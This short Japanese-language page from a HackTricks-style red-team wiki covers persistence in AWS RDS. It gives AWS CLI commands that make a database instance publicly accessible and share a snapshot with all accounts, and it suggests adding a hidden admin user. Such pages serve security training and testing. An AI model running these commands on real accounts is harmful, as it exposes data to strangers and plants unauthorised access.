AWS - RDS Persistence

Reading time: 3 minutes

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

RDS

詳細については、次を確認してください:

AWS - Relational Database (RDS) Enum

インスタンスを公開アクセス可能にする: rds:ModifyDBInstance

この権限を持つ攻撃者は、既存のRDSインスタンスを変更して公開アクセスを有効にすることができます

bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

DB内に管理者ユーザーを作成する

攻撃者は単にDB内にユーザーを作成することができるため、マスターユーザーのパスワードが変更されてもデータベースへのアクセスを失うことはありません

スナップショットを公開する

bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする